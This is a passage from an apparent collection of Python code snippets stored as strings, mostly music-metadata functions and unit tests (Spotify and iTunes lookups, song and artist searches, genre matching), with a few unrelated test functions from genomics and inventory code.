= 'Artist'\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'\n service_config.track_store.get_by_artist.assert_called_with(artist_id)", "def test_get_sample_ids(self):\r\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\r\n parse_metadata_state_descriptions('Study:Twin')), [])\r\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\r\n parse_metadata_state_descriptions('Study:Dog')), ['a', 'b'])\r\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\r\n parse_metadata_state_descriptions('Study:*,!Dog')), ['c', 'd', 'e'])\r\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\r\n parse_metadata_state_descriptions('Study:*,!Dog;BodySite:Stool')), ['e'])\r\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\r\n parse_metadata_state_descriptions('BodySite:Stool')), ['a', 'b', 'e'])", "def get_artist_genres(artist_id):\n profile_endpoint = 'https://api.spotify.com/v1/artists/' + artist_id\n\n r = requests.get(profile_endpoint)\n print r.status_code\n \n if r.status_code != 200:\n return None\n artist_info = r.json()\n genre_names = artist_info['genres']\n genres = [Genre(name=genre) for genre in genre_names]\n print genres\n return genres", "def prepare_mirex_lastfmapi_dataset(which='mirex'):\n assert which in ['lastfmapi', 'mirex']\n\n raw_folder_path = f\"{raw_dataset_path}/dataset_similarity_oramas_et_al\"\n preprocessed_folder_path = f\"{preprocessed_dataset_path}/similarity/{which}\"\n os.makedirs(preprocessed_folder_path, exist_ok=True)\n musicbrainzngs_setup()\n\n # create items.json:\n # an entry for every artist present in mirex_gold.txt, including also those in the top-n most similar list.\n\n artists = []\n with open(f\"{raw_folder_path}/{which}_gold.txt\") as f:\n for line in f.read().split('\\n')[:-1]:\n\n # artists with a ground truth of less than 10 items should be excluded, according to the paper\n if len(line.split('\\t')[1].split(' ')) >= 10:\n artists += [line.split('\\t')[0]]+line.split('\\t')[1].split(' ')\n\n artists = list(set(artists))\n items = []\n for a in tqdm(artists):\n artist_name = musicbrainzngs.get_artist_by_id(a)['artist']['name']\n d = {\n 'id': a,\n 'seed': {\n 'artist_musicbrainz_id': a,\n 'artist_name': artist_name,\n }\n }\n items.append(d)\n\n with open(f\"{preprocessed_folder_path}/items.json\", 'w', encoding='utf-8') as f:\n json.dump(items, f, ensure_ascii=False, indent=4)\n\n # create similar_items_ground_truth.json\n\n ground_truth_validation = {}\n ground_truth_test = {}\n with open(f\"{raw_folder_path}/{which}_gold.txt\") as f:\n for line in f.read().split('\\n')[:-1]:\n\n # artists with a ground truth of less than 10 items should be excluded, according to the paper\n if len(line.split('\\t')[1].split(' ')) >= 10:\n held_out = line.split('\\t')[1].split(' ')\n\n sample = random.sample(held_out, len(held_out))\n sample_validation = sample[:len(sample)//2]\n sample_test = sample[len(sample)//2:]\n ground_truth_validation[line.split('\\t')[0]] = sample_validation\n ground_truth_test[line.split('\\t')[0]] = sample_test\n\n with open(f\"{preprocessed_folder_path}/similar_items_ground_truth_validation.json\", 'w', encoding='utf-8') as f:\n json.dump(ground_truth_validation, f, ensure_ascii=False, indent=4)\n\n with open(f\"{preprocessed_folder_path}/similar_items_ground_truth_test.json\", 'w', encoding='utf-8') as f:\n json.dump(ground_truth_test, f, ensure_ascii=False, indent=4)", "def test_song_counts(self):\n self.assertEqual(self.show.total_song_count, 19)\n self.assertEqual(self.show.set1_song_count, 9)\n self.assertEqual(self.show.set2_song_count, 8)\n self.assertEqual(self.show.set3_song_count, 0)\n self.assertEqual(self.show.encore_song_count, 1)\n self.assertEqual(self.show.encore2_song_count, 1)", "def test_sounds_get(self):\n pass", "def test_get_gm_track_artists_ft_2(self):\r\n gm_track = gmusic.GMusicTrack(\r\n title='MMXXX (ft Moor Mother)',\r\n artist='Earthmother'\r\n )\r\n expected = ['Earthmother', 'Moor Mother']\r\n actual = gmspotify.get_gm_track_artists(gm_track)\r\n self.assertEqual(actual, expected)", "def get_songs(path):\r\n song_list = []\r\n genre_paths = glob.glob(path + '/*')\r\n for genre_path in genre_paths:\r\n artist_paths = glob.glob(genre_path + '/*')\r\n for artist_path in artist_paths:\r\n album_paths = glob.glob(artist_path + '/*')\r\n for album_path in album_paths:\r\n lyrics_paths = glob.glob(album_path + '/*.txt')\r\n for lyrics_path in lyrics_paths:\r\n song = {}\r\n song[\"genre\"] = genre_path.replace(path + '/', '')\r\n song[\"artist\"] = artist_path.replace(genre_path + '/', '')\r\n song[\"album\"] = album_path.replace(artist_path + '/', '')\r\n song[\"lyrics\"] = open(lyrics_path).read()\r\n song[\"name\"] = lyrics_path[:-4].replace(album_path + '/', '')\r\n song[\"x\"] = 0\r\n song[\"y\"] = 0\r\n song_list.append(song)\r\n return song_list", "def test_ms_artist_search(helpers):\n common_tests(\n MSArtist,\n MS_ARTIST_SEARCH_XML,\n MS_ARTIST_SEARCH_DICT,\n \"00020064artistsearch:Fritjof\",\n helpers,\n )", "def test_get_songs_by_album_id(self, track_elms, service_config, request):\n album_id = uuid.UUID(avalon.compat.to_uuid_input('37cac253-2bca-4a3a-be9f-2ac655e04ad8'))\n service_config.track_store.get_by_album.return_value = track_elms\n request.args['album_id'] = six.text_type(album_id)\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'\n service_config.track_store.get_by_album.assert_called_with(album_id)", "def test_check_gff():\n gene_list = []\n gene, gene_list= check_gff(INPUT_ok, gene_list)\n # print(gene, gene_list)\n assert_equal(gene, \"GPLIN_000000100\")\n assert_equal(gene_list, [\"GPLIN_000000100\"])", "def test_gather_success(self):\n gathered_items = self.Quant._gather(self.apple, self.test_stock_location_01)\n # Check the number of apple quants returned is correct\n self.assertEqual(len(gathered_items), 3)\n # Check that the products are all of expected type\n self.assertEqual(gathered_items.product_id, self.apple)\n\n # Unfold the returned quants\n _q1, second_quant, _q2 = gathered_items\n # Check when quant_ids is set in the context\n gathered_items_subset = self.Quant.with_context(quant_ids=[second_quant.id])._gather(\n self.apple, self.test_stock_location_01\n )\n self.assertEqual(len(gathered_items_subset), 1)\n self.assertEqual(gathered_items_subset.product_id, self.apple)\n self.assertEqual(gathered_items_subset, second_quant)", "def search_genres(self, needle):\n return self._genre_search.search(searchable(needle))", "def get_genres(self) -> List[Genre]:\n raise NotImplementedError", "def test_matching_tracks(self):\n\n # 5037: Pop 101 (feat. Anami Vice) by Marianas Trench\n # 8755 : Satisfied (feat. Miguel & Queen Latifah) by Sia\n # 6699 : Un Besito Mas (feat. Juan Luis Guerra) by Jesse & Joy\n targets = {5037: '2fGFaTDbE8aS4f31fM0XE4',\n 8755: '1ybJ2itxCxPCPkcA9sOgTO',\n 6699: '1182pxG4uNxr3QqIH8b8k0',\n }\n\n matches = {track.i_id: track.id\n for track in self.tracks\n if track.i_id in targets}\n\n for i_id, s_id in targets.iteritems():\n self.assertEqual(s_id, matches[i_id])", "def get_all_genres(self):\n self.cursor.execute(\"select * from genres\")\n self.connection.commit()\n return self.cursor.fetchall()", "def test_genius(self):\n bad_res = lw.get_lyrics('genius', 'eminem', 'los yourself')\n good_res = lw.get_lyrics('genius', 'eminem', 'lose yourself')\n self.assertEqual(bad_res, 404)\n self.assertTrue(good_res)", "def _get_artists_genre(self, track_df):\n\n sp = self.spotify_clients['user-library-read']\n artistid_to_genre = {}\n\n \"\"\"\n TODO\n Get genre by each artist_id is slow,\n but I got some problems when I use spotipy's artists function\n \"\"\"\n\n for artist_id in track_df['artist_id'].tolist():\n result = sp.artist(artist_id)\n artist_id = result['id']\n genres = result['genres']\n\n if len(genres) == 0:\n continue\n else:\n artistid_to_genre[artist_id] = genres\n\n return artistid_to_genre", "def test_items(self):\n obs = self.tester.items()\n self.assertTrue(isinstance(obs, Iterable))\n exp = [('1.SKB1.640202', PrepSample('1.SKB1.640202', self.tester)),\n ('1.SKB2.640194', PrepSample('1.SKB2.640194', self.tester)),\n ('1.SKB3.640195', PrepSample('1.SKB3.640195', self.tester)),\n ('1.SKB4.640189', PrepSample('1.SKB4.640189', self.tester)),\n ('1.SKB5.640181', PrepSample('1.SKB5.640181', self.tester)),\n ('1.SKB6.640176', PrepSample('1.SKB6.640176', self.tester)),\n ('1.SKB7.640196', PrepSample('1.SKB7.640196', self.tester)),\n ('1.SKB8.640193', PrepSample('1.SKB8.640193', self.tester)),\n ('1.SKB9.640200', PrepSample('1.SKB9.640200', self.tester)),\n ('1.SKD1.640179', PrepSample('1.SKD1.640179', self.tester)),\n ('1.SKD2.640178', PrepSample('1.SKD2.640178', self.tester)),\n ('1.SKD3.640198', PrepSample('1.SKD3.640198', self.tester)),\n ('1.SKD4.640185', PrepSample('1.SKD4.640185', self.tester)),\n ('1.SKD5.640186', PrepSample('1.SKD5.640186', self.tester)),\n ('1.SKD6.640190', PrepSample('1.SKD6.640190', self.tester)),\n ('1.SKD7.640191', PrepSample('1.SKD7.640191', self.tester)),\n ('1.SKD8.640184', PrepSample('1.SKD8.640184', self.tester)),\n ('1.SKD9.640182', PrepSample('1.SKD9.640182', self.tester)),\n ('1.SKM1.640183', PrepSample('1.SKM1.640183', self.tester)),\n ('1.SKM2.640199', PrepSample('1.SKM2.640199', self.tester)),\n ('1.SKM3.640197', PrepSample('1.SKM3.640197', self.tester)),\n ('1.SKM4.640180', PrepSample('1.SKM4.640180', self.tester)),\n ('1.SKM5.640177', PrepSample('1.SKM5.640177', self.tester)),\n ('1.SKM6.640187', PrepSample('1.SKM6.640187', self.tester)),\n ('1.SKM7.640188', PrepSample('1.SKM7.640188', self.tester)),\n ('1.SKM8.640201', PrepSample('1.SKM8.640201', self.tester)),\n ('1.SKM9.640192', PrepSample('1.SKM9.640192', self.tester))]\n # Creating a list and looping over it since unittest does not call\n # the __eq__ function on the objects\n for o, e in zip(sorted(list(obs)), sorted(exp)):\n self.assertEqual(o, e)", "def samples_set(self):\n self.get_samples_set(self.samples_db)\n self.choose_samples(self.chosen_samples_db, self.chosen_hashes)", "def test_get_gm_track_artists_ampersand(self):\r\n gm_track = gmusic.GMusicTrack(\r\n title='Zhao Hua', artist='HVAD & Pan Daijing')\r\n expected = ['HVAD', 'Pan Daijing']\r\n actual = gmspotify.get_gm_track_artists(gm_track)\r\n self.assertEqual(actual, expected)", "def test_iter_variants(self):\n # We expect the variants in the same order as the BIM.\n expected = [\n truth.variants[\"rs785467\"],\n truth.variants[\"rs146589823\"],\n truth.variants[\"rs9628434\"],\n truth.variants[\"rs140543381\"],\n ]\n\n with self.reader_f() as f:\n for i, v in enumerate(f.iter_variants()):\n self.assertEqual(v, expected[i])\n\n self.assertEqual(i, len(expected) - 1) # All variants were iterated.", "def add_songs(self, artist_list):\n\n \"Terms that identify songs that aren't really songs\"\n conn = self.conn\n conn.text_factory = str\n c = conn.cursor()\n\n if artist_list is None:\n return \"You must provide a list of artists for whom to find songs.\"\n else:\n for artist in artist_list:\n print(\"Finding songs for \" + artist)\n all_songs_by_artist = pygenius_songs.findAllSongs(artist)\n already_scraped = list()\n for song in all_songs_by_artist:\n url = song[0]\n title = song[1]\n print(title)\n c.execute(\"SELECT count(*) FROM songs WHERE title = (?) AND artist = (?)\", (title, artist))\n check_in_db = c.fetchall()\n if check_in_db[0][0] == 0:\n if title not in already_scraped:\n if not [i for i, x in enumerate(self.bad_terms) if x in title]:\n already_scraped.append(title)\n c.execute('INSERT INTO songs(title, artist, url) values (?,?,?)', (title, artist, url))\n conn.commit()", "def test_ms_album_search(helpers):\n item_from_xml, item_from_dict = common_tests(\n MSAlbum,\n MS_ALBUM_SEARCH_XML,\n MS_ALBUM_SEARCH_DICT,\n \"00020064albumsearch:de unge\",\n helpers,\n )\n getter_attributes_test(\n \"artist\", item_from_xml, item_from_dict, MS_ALBUM_SEARCH_DICT.get(\"artist\")\n )\n getter_attributes_test(\n \"uri\", item_from_xml, item_from_dict, MS_ALBUM_SEARCH_DICT[\"uri\"]\n )", "def get_audios_and_labels(data_dir: str) -> (List[Any], List[int]):\n test_dataset = get_dataset(data_dir)\n test_audios = []\n test_labels = []\n for audio, label in test_dataset:\n test_audios.append(audio.numpy())\n test_labels.append(label.numpy())\n test_audios = np.array(test_audios)\n test_labels = np.array(test_labels)\n return test_audios, test_labels", "def find_song_recommendations(access_token, tracks, target, n, params):\n track_string = '%2C'.join(tracks[:5])\n response = spotify.get_recommendations(access_token, 50, track_string, params)\n\n song_recommendation = response['tracks']\n recommendations = {song['id']: {'name': song['name']} for song in song_recommendation}\n\n moods = get_features_moods(recommendations)\n\n return order_songs(moods, target, n)", "def test_get_songs_by_artist_id(self, track_elms, service_config, request):\n artist_id = uuid.UUID(avalon.compat.to_uuid_input('75d590d1-9f3d-462d-8264-0d16af227860'))\n service_config.track_store.get_by_artist.return_value = track_elms\n request.args['artist_id'] = six.text_type(artist_id)\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'\n service_config.track_store.get_by_artist.assert_called_with(artist_id)", "def test_loadData():\n \n sys = LVsystem.Ecosystem()\n \n sys.loadSetup('2Prey1Predator')\n \n \n data = sys.create_data()\n \n assert data[0] == 3\n assert data[1] == ['rabbit', 'hen', 'fox']\n assert data[2] == [30,10,20]\n assert data[3] == [0.09,0.07,-0.06] \n assert data[4] == [10000,10000,1]\n assert data[5] == [400,500,250]\n assert data[6][1][2] == -data[6][2][1]\n assert data[6][2][2] == 0\n\n sys.removeSpecies('rabbit')\n sys.removeSpecies('fox')\n sys.removeSpecies('hen')", "def matchGenres(toPredictGenresString, toCompareGenresString):\n\n #Get the sets of genres\n toPredictGenres = str(toPredictGenresString).split(\"|\")\n toCompareGenres = str(toCompareGenresString).split(\"|\")\n\n toCompareGenresSet = set(toCompareGenres)\n\n commonCount = 0\n\n #Count how many are common to the two sets\n for genre in toPredictGenres:\n if genre in toCompareGenresSet:\n commonCount += 1\n\n #Return 100 times the proportion in both\n return 100 * commonCount/len(toPredictGenres)", "def test_csv(test_data,tmp_path):\n\n for d in test_data:\n\n gpm = GenotypePhenotypeMap(genotype=d[\"genotype\"],\n wildtype=d[\"wildtype\"],\n phenotype=d[\"phenotype\"],\n uncertainty=d[\"uncertainty\"])\n\n # Write out a csv file\n out_file = os.path.join(tmp_path,\"tmp.csv\")\n gpm.to_csv(out_file,index=False)\n assert os.path.exists(out_file)\n\n gpm_read = gpmap.read_csv(out_file,wildtype=d[\"wildtype\"])\n\n # Make sure the written and read gpmaps ar ethe same\n conftest.compare_gpmap(gpm,gpm_read)\n\n # Do not give wildtype. Should still work because the wildtype was\n # inferred.\n gpm_read = gpmap.read_csv(out_file)\n conftest.compare_gpmap(gpm,gpm_read)\n\n # Check ability to read labels back in\n site_labels = [f\"{x}\" for x in range(10,10+len(d[\"wildtype\"]),1)]\n gpm = GenotypePhenotypeMap(genotype=d[\"genotype\"],\n wildtype=d[\"wildtype\"],\n site_labels=site_labels)\n out_file = os.path.join(tmp_path,\"tmp.csv\")\n gpm.to_csv(out_file)\n\n gpm_read = gpmap.read_csv(out_file)\n\n for i in range(len(gpm_read.site_labels)):\n\n # Skip virtual site_labels added for invariant sites\n if len(d[\"mutations\"][i]) == 1:\n continue\n\n assert gpm_read.site_labels[i] == gpm.site_labels[i]\n\n # Read in with bad wildtype. Should throw warning and then have\n # sequential site labels.\n with pytest.warns(UserWarning):\n gpm_read = gpmap.read_csv(out_file,wildtype=d[\"mutant\"])\n\n assert np.array_equal(gpm_read.site_labels,range(len(d[\"wildtype\"])))", "def test_all_good(self):\n self.driver.start_sampling()\n\n self.create_sample_data_set_dir(\n \"node59p1_all_good1.dat\",\n TELEM_DIR,\n \"node59p1.dat\"\n )\n self.assert_data(\n (DostadParserTelemeteredDataParticle, DostadParserTelemeteredMetadataDataParticle),\n 'test_data_1-2.txt.result.yml',\n count=3\n )\n\n self.create_sample_data_set_dir(\n \"node59p1_all_good.dat\",\n TELEM_DIR,\n \"node59p1.dat\"\n )\n self.assert_data(\n DostadParserTelemeteredDataParticle,\n 'test_data_all_good.txt.result.yml',\n count=1\n )", "def __set_info_from_itunes(self, data: Any, query: str) -> None:\n if data['resultCount'] == 0:\n return\n Logger.Logger.log('Processing metadata from iTunes...')\n index: int = 0\n if data['resultCount'] != 1 and not Config.Config.get_strict_meta():\n Logger.Logger.log('Multiple results returned by iTunes, filtering them...')\n index = Song.__filter_itunes_results(data['results'], query)\n data = data['results'][index]\n # Add support for album artist and composer.\n self.title = data['trackName']\n self.artist = data['artistName']\n self.album_artist = data['artistName']\n self.genre = data['primaryGenreName']\n self.album = data['collectionName']\n release_date: datetime = datetime.strptime(data['releaseDate'], '%Y-%m-%dT%H:%M:%SZ')\n self.year = release_date.year\n self.cover_url = data['artworkUrl100'].replace('100x100bb.jpg', '1000x1000bb.jpg')\n self.disc_count = data['discCount']\n self.disc_number = data['discNumber']\n self.track_count = data['trackCount']\n self.track_number = data['trackNumber']\n # TODO: Currently iTunes doesn't support information about group and composer.\n # self.group = data['artistName']\n # self.composer = data['artistName']\n if data['trackExplicitness'] == 'explicit':\n self.explicit = True\n else:\n self.explicit = False\n self.album_url = data['artistViewUrl']\n self.track_url = data['trackViewUrl']", "def test_testGenerator():\n\n # check type\n assert isinstance(testset, list)\n\n # check the shape\n assert len(testset)==newObs.shape[0]", "def check_frequencies(self, args):\n\n for file in args.frequencies:\n self._check_valid_file(file[0])", "def checkid3(filename):\n datas = None\n mdat = None\n\n try:\n mdat = mutagen.File(filename, easy=True)\n except:\n msg = \"mutagen failed %s\" % sys.exc_value\n Logs.objects.create(filename=filename, message=msg)\n\n if mdat is not None:\n try:\n genre = mdat['genre'][0]\n except:\n genre = ''\n\n try:\n datas = {'artist': mdat['artist'][0],\n 'album': mdat['album'][0],\n 'title': mdat['title'][0],\n 'genre': genre}\n except KeyError:\n msg = \"%s : %s is not in the list.\" % (str(sys.exc_type),\n sys.exc_value)\n Logs.objects.create(filename=filename, message=msg)\n\n return datas", "def song_search_matching(chart_song, query):\n song_searches = song_search(query, NUM_SONG_SEARCH_RESULTS)\n if 'error' in song_searches:\n print('>>> error:', song_searches['error'])\n return\n\n songs = []\n # print(song_searches)\n for s in song_searches['songs']:\n # print('test song:', s)\n performers = ' '.join(x['name'] for x in s['performers']).lower()\n\n print('checking performers:', performers, 'vs.', chart_song.artist.lower())\n print('checking titles:', '\"' + s['title']['name'] + '\"', 'vs.', '\"' + chart_song.title + '\"')\n diff1 = fuzz.token_set_ratio(chart_song.artist.lower(), performers)\n diff2 = difflib.SequenceMatcher(\n None,\n a=s['title']['name'].lower(),\n b=chart_song.title.lower()\n ).ratio()\n print('performer score:', diff1, 'and title score:', diff2)\n if diff1 >= 65 and diff2 > 0.75:\n songs.append(s)\n print('song passed with diff performers of', diff1, 'and diff title of', diff2)\n if diff1 <= 75 or diff2 < 0.85:\n print('NOTE impartial match?', s, 'for', chart_song)\n\n return songs", "def test_too_many_songs(self):\n artist = Artist.objects.create(name='Artist', normname='artist')\n album = Album.objects.create(artist=artist, name='Album', normname='album')\n for num in range(501):\n Song.objects.create(filename='file%03d.mp3' % (num+1),\n artist=artist,\n album=album,\n title='Title %03d' % (num+1),\n year=0,\n tracknum=0,\n normtitle='title %03d' % (num+1),\n raw_artist='artist',\n filetype=Song.MP3,\n bitrate=128000,\n mode=Song.CBR,\n size=123000,\n length=90,\n sha256sum='0cf31fc7d968ec16c69758f9b0ebb2355471d5694a151b40e5e4f8641b061092',\n )\n\n response = self.client.get(reverse('exordium:artist', args=(artist.normname,)))\n self.assertEqual(response.status_code, 200)\n self.assertQuerysetEqual(response.context['albums'].data, [repr(album)])\n self.assertEqual(response.context['have_songs'], False)\n self.assertNotIn('songs', response.context)\n self.assertNotContains(response, 'Songs by %s' % (artist))\n self.assertContains(response, reverse('exordium:artist', args=(artist.normname,)))\n self.assertContains(response, reverse('exordium:album', args=(album.pk,)))\n self.assertContains(response, '1 album')\n self.assertNotContains(response, '1 song')", "def extract_data():\n args = arguments()\n\n if args.list is not None:\n songs = utility.get_songs(args.list)\n logger.debug(str(songs))\n if len(songs) != 0:\n logger.info(\"Downloading songs in {}\".format(args.list))\n for song_name in songs:\n logger.debug(song_name)\n args.SONG_NAME = [song_name]\n main(args)\n else:\n logger.info(\"{}: is empty\".format(args.list))\n elif args.SONG_NAME and yt.is_playlist(args.SONG_NAME[0]):\n logger.info(\"Youtube playlist passed...extracting!\")\n songs, playlist_name = yt.get_playlist(\n args.SONG_NAME[0],\n args.proxy,\n args.pl_start,\n args.pl_end,\n args.pl_items\n )\n\n # Check if data is actually returned\n if songs is None:\n logger.error(\"Couldn't extract playlist data!\")\n\n logger.info(\"Playlist: {}\".format(playlist_name))\n logger.info(\"{} songs found\".format(len(songs)))\n\n # Iterate and work on the data.\n url_base = \"https://www.youtube.com/watch?v=\"\n for song in songs:\n args.url = url_base + song[\"url\"]\n\n # Try to pass the title as well, if it's not there\n # that will be handled by ytmdl\n try:\n args.SONG_NAME = [stringutils.remove_yt_words(song[\"title\"])]\n except KeyError:\n pass\n\n main(args)\n else:\n main(args)", "def test_get_s_track_artists(self):\r\n sp_track = spotify.SpAlbumTrack(munch.munchify({'artists': [{'external_urls': {'spotify': 'https://open.spotify.com/artist/25BObiRSDCMwVrBGIVaLIf'}, 'href': 'https://api.spotify.com/v1/artists/25BObiRSDCMwVrBGIVaLIf', 'id': '25BObiRSDCMwVrBGIVaLIf', 'name': 'James K', 'type': 'artist', 'uri': 'spotify:artist:25BObiRSDCMwVrBGIVaLIf'}, {'external_urls': {'spotify': 'https://open.spotify.com/artist/1g80vffuPrdapR6S4WyxN3'}, 'href': 'https://api.spotify.com/v1/artists/1g80vffuPrdapR6S4WyxN3', 'id': '1g80vffuPrdapR6S4WyxN3', 'name': 'Eve Essex', 'type': 'artist', 'uri': 'spotify:artist:1g80vffuPrdapR6S4WyxN3'}], 'available_markets': ['AD', 'AE', 'AR', 'AT', 'AU', 'BE', 'BG', 'BH', 'BO', 'BR', 'CA', 'CH', 'CL', 'CO', 'CR', 'CY', 'CZ', 'DE', 'DK', 'DO', 'DZ', 'EC', 'EE', 'EG', 'ES', 'FI', 'FR', 'GB', 'GR', 'GT', 'HK', 'HN',\r\n 'HU', 'ID', 'IE', 'IL', 'IN', 'IS', 'IT', 'JO', 'JP', 'KW', 'LB', 'LI', 'LT', 'LU', 'LV', 'MA', 'MC', 'MT', 'MX', 'MY', 'NI', 'NL', 'NO', 'NZ', 'OM', 'PA', 'PE', 'PH', 'PL', 'PS', 'PT', 'PY', 'QA', 'RO', 'SA', 'SE', 'SG', 'SK', 'SV', 'TH', 'TN', 'TR', 'TW', 'US', 'UY', 'VN', 'ZA'], 'disc_number': 1, 'duration_ms': 260446, 'explicit': False, 'external_urls': {'spotify': 'https://open.spotify.com/track/1mh4GpKKrmlaUkVzoNqhRt'}, 'href': 'https://api.spotify.com/v1/tracks/1mh4GpKKrmlaUkVzoNqhRt', 'id': '1mh4GpKKrmlaUkVzoNqhRt', 'is_local': False, 'name': 'Stretch Deep - feat. Eve Essex', 'preview_url': 'https://p.scdn.co/mp3-preview/ebb7e70b97a5d29e05044a1f920d1fc594f92b26?cid=ea3ef49a097b42d682d3c7bc98832d65', 'track_number': 12, 'type': 'track', 'uri': 'spotify:track:1mh4GpKKrmlaUkVzoNqhRt'}))\r\n expected = ['Eve Essex', 'James K']\r\n actual = gmspotify.get_sp_track_artists(sp_track)\r\n self.assertEqual(actual, expected)", "def test_genomic(self):\n self.c.execute(\"\"\"select expIds,expScores from genomic_test\"\"\")\n rows = self.c.fetchall()\n self.assertEqual(len(rows), 1) # one probe\n self.assertEqual(rows[0][0], '0,1,2,3,4') # ordered by sample id\n values = map(lambda x: float(x), rows[0][1].split(',')) # scores are in correct order\n self.assertTrue(values[0] - 0.479005065149792 < self.tolerance)\n self.assertTrue(values[1] - 25.1 < self.tolerance)\n self.assertTrue(values[2] - 5.3 < self.tolerance)\n self.assertTrue(values[3] - 3.1 < self.tolerance)\n self.assertTrue(values[4] - -1.23 < self.tolerance)", "def test_accuracy():\n hits = 0\n total = 0\n # create_database()\n # gen_random_samples()\n song_to_id, id_to_song, hash_dict = load_database()\n for filename in os.listdir(\"Songs\"):\n sample_dict = hash_random_sample(filename)\n offset_dict, song_id = find_song(\n hash_dict, sample_dict, id_to_song)\n print(id_to_song[song_id])\n print(filename)\n if id_to_song[song_id] == filename:\n print(\"Success\")\n hits += 1\n else:\n print(\"Fail\")\n total += 1\n print((hits / total) * 100, \" %\")", "def test_get_songs_by_query(self, track_elms, service_config, request):\n service_config.search.search_tracks.return_value = track_elms\n request.args['query'] = 'Dummy'\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'", "def test_check_all_ids(self):\r\n\r\n fasta_labels = ['sample1_1', 'sample1_2', 'sample3_3', 'sample2_4']\r\n\r\n sample_ids = ['sample1', 'sample2', 'sample3']\r\n\r\n sample_ids_not_found = check_all_ids(fasta_labels, sample_ids)\r\n\r\n # should return True as all are found\r\n\r\n self.assertEqual(sample_ids_not_found, True)\r\n\r\n fasta_labels = ['sample1_1', 'sample1_2', 'sample3_3', 'sample2_4']\r\n\r\n sample_ids = ['sample1', 'sample2', 'sample3', 'sampleX']\r\n\r\n sample_ids_not_found = check_all_ids(fasta_labels, sample_ids)\r\n\r\n # sampleX should not be found\r\n\r\n self.assertEqual(sample_ids_not_found, ['sampleX'])", "def test_ms_track_search(helpers):\n item_from_xml, item_from_dict = common_tests(\n MSTrack,\n MS_TRACK_SEARCH_XML,\n MS_TRACK_SEARCH_DICT,\n \"00020064tracksearch:pilgrim\",\n helpers,\n )\n getter_attributes_test(\n \"artist\", item_from_xml, item_from_dict, MS_TRACK_SEARCH_DICT.get(\"artist\")\n )\n getter_attributes_test(\n \"uri\", item_from_xml, item_from_dict, MS_TRACK_SEARCH_DICT[\"uri\"]\n )", "def load_data():\n\n current_artist = None\n current_album = None\n artist_list = []\n\n print(\"Loading music data...\")\n\n with open(\"albums.txt\", \"r\") as albums:\n for line in albums:\n # bind variables to the fields of each line (stripping new line char and splitting on tabs)\n artist_field, album_field, year_field, song_field = tuple(line.strip(\"\\n\").split(\"\\t\"))\n year_field = int(year_field) # convert string value to int\n print(f\"\\t{artist_field}:{album_field}:{year_field}:{song_field}\")\n\n # Creates an Artist object for the artists read from artist_field using the current_artist tracker.\n # If there's no current_artist, simply creates an Artist object for the first artist read.\n if current_artist is None:\n current_artist = Artist(artist_field)\n # If there is a current current_artist, uses that tracker to detect when the artist being read changes.\n # When this happens, adds current current_album to the artists album list,\n # appends the artist to the artist list, creates a new Artist object for the next artist being read,\n # and resets current_album to None.\n elif current_artist.name != artist_field:\n current_artist.add_album(current_album)\n artist_list.append(current_artist)\n current_artist = Artist(artist_field)\n current_album = None\n\n # Creates an Album object for the albums read from album_field using the current_album tracker.\n # Follows a very similar process to the current_artist assignment above.\n if current_album is None:\n current_album = Album(album_field, year_field, current_artist)\n elif current_album.name != album_field:\n current_artist.add_album(current_album)\n current_album = Album(album_field, year_field, current_artist)\n\n # Creates a new Song object, and adds it to current_album object\n current_song = Song(song_field, current_artist)\n current_album.add_song(current_song)\n\n # Add final artist/album to their respective lists\n if current_artist is not None:\n if current_album is not None:\n current_artist.add_album(current_album)\n artist_list.append(current_artist)\n\n print(f\"A total of {len(artist_list)} artists were loaded.\")\n print()\n print(\"=\" * 40)\n print()\n return artist_list", "def test_0():\n sync.gen_multi_fake_data()#default is only one randomly selected data set\n sync.main(testing=True)", "def test_get_songs_no_params(self, track_elms, service_config, request):\n service_config.track_store.get_all.return_value = track_elms\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected all tracks returned'", "def get_artist_audio_features(q, interactive = False, genre_delimiter = '-!!-', to_file = '', client = None):\n query = client.search(q = q, type = \"artist\")\n items = query['artists']['items']\n\n if not items:\n raise Exception(\"No artists found\")\n\n if interactive:\n print(\"Select the artist to use...\")\n print(\"\\n\".join(\"[{}]: {}\".format(ii, entry['name']) for ii, entry in enumerate(items)))\n artist_indx = int(input(\"artist number: \").strip())\n if artist_indx > len(items):\n raise IndexError(\"Selected number higher than options available\")\n artist = items[artist_indx]\n else:\n artist = items[0]\n\n # get artist genres\n artist_genres = genre_delimiter.join(artist['genres']) if genre_delimiter else None\n\n # get artist albums\n albums = get_artist_albums(artist['id'])\n albums['artist_genres'] = artist_genres\n\n # get album popularity\n album_popularity = get_album_popularity(albums.id)\n\n # get album tracks\n tracks = get_album_tracks(albums.id)\n\n # get track audio features\n features = get_track_features(tracks.id)\n\n # get track popularity\n popularity = get_track_popularity(tracks.id)\n\n album_data = albums.merge(album_popularity, 'left', 'id')\n\n track_data = tracks \\\n .drop(columns = ['type']) \\\n .merge(popularity, 'left', 'id') \\\n .merge(features.drop(columns = ['uri', 'type', 'duration_ms']), 'left', 'id')\n\n\n merged = prefix_merge(album_data, track_data, ['album_', 'track_'], how = 'left', on = 'album_id')\n\n if to_file:\n merged.to_csv(to_file)\n\n return merged", "def main():\n songs = []\n first_line = sys.stdin.readline().split(' ', 1)\n songs_on_album, songs_to_select = int(first_line[0]), int(first_line[1])\n for i in range(songs_on_album):\n line = sys.stdin.readline().split(' ', 1)\n song = Song(line[1], int(line[0]), i+1)\n songs.append(song)\n\n print_quality_songs(songs, songs_to_select)", "def all_artists(our_data):\n return [album['artist'] for album in our_data]", "def _match_tracks(artist, title, 